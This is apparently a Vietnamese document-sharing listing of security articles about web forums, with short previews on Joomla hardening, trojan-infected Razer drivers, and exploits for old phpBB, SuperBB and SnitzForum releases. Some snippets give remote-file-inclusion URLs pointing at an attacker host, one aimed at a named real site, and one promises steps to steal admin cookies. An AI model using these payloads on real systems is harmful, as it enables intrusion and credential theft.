Lỗi bảo mật forum

Bài viết này xin cung cấp cho bạn một loạt các thủ thuật để tăng cường bảo mật cho Website Joomla! được trích dẫn từ diễn đàn Joomla! (http://forum.joomla.org). Có thể một vài thủ thuật hơi khó thực hiện hoặc gây khó khăn, thâm chí là lỗi cho hệ thống của bạn, tuy nhiên đừng nản chí , mọi cái đều có giá của nó. Nếu không thiết lập một vòng đai an toàn cho Website sẽ có lúc bạn phải hối tiếc vì điều đó và thiệt hại có khi là không tính đếm được. Hãy tiến hành ngay...

3p bibocumi21 19-12-2012 141 30   Download

Driver của Razer “dính” virus .ComputerWord cho hay, các driver cho chuột và bàn phím game chuyên dụng Razer trên trang web chính thức đã bị nhiễm trojan. Nhà sản xuất phát hiện nhờ hãng bảo mật Trend Micro và đã ngay lập tức tạm đóng phần hỗ trợ khách hàng trên trang web. Từ những lời than phiền của khách hàng trên forum, hãng untivirus Trend Micro đã quét toàn bộ driver và các file Firmware từ trang web chính thức của Razer. Và thật bất ngờ, rất nhiều trong số đó đã nhiễm virus. Chúng sẽ khởi động khi khách...

6p yeurauxanh88 27-09-2012 44 4   Download

Các forum phpBB 1.4.x có một lỗi rất nghiêm trọng cho phép một user bình thường có thể chạy đoạn lệnh cho phép cập nhật vài thông tin trong preferences để có được quyền admin. Một trong số lỗi được tìm thấy trong đoạn code sau...

1p vn9h_vnc 26-04-2011 186 7   Download

Khai thác lỗi bảo mật forum SuperBB : Tạo trên host http://[attacker]/lang/1/1_options.php Chạy trên trình duyệt http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod e=1 Cách test: 1. Đăng ký một host ko support PHP. 2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1, trong folder 1 tạo một file tên là 1_options.php với nội dung như sau: CODE Chạy trên trình duyệt http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod e=1 Nếu thấy có dòng chữ "Hello world" thì OK, site đang test bị lỗi này Câu hỏi: 1.

1p tt1991tt 20-02-2011 171 20   Download

Sử dụng REM VIEW để xem file trên Server : Lỗi sử dụng ở đây là lỗi trong file install.php của forum phpBB 2.0.1 và 2.0.2, các forum dạng này và dính lỗi này rát khổ biến trên NET và Luke đã không khó để có thể chọn random một site làm ví dụ http://www.cyberantics.net/forum/ Bước 1: Kiểm tra xem site đó còn file install.php hay không http://www.cyberantics.net/forum/install.php và may mắn câu trả lời là có. Chúng ta cần chú ý về mã nguồn PHP của nó một chút. Quote Và đồng thời tôi nhập URL sau http://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.

3p tt1991tt 20-02-2011 280 12   Download

SnitzForum có một lỗi khiến cho hacker có thể chạy được JavaScript để lấy cookie. Trong cookie này chứa username và password. Nếu ta lấy được username/pass của admin thì có thể kiểm soát được hoàn toàn forum đó. Sau đây là các bước để hack các diễn đàn dùng SnitzForum

1p ad_uit 09-01-2011 93 19   Download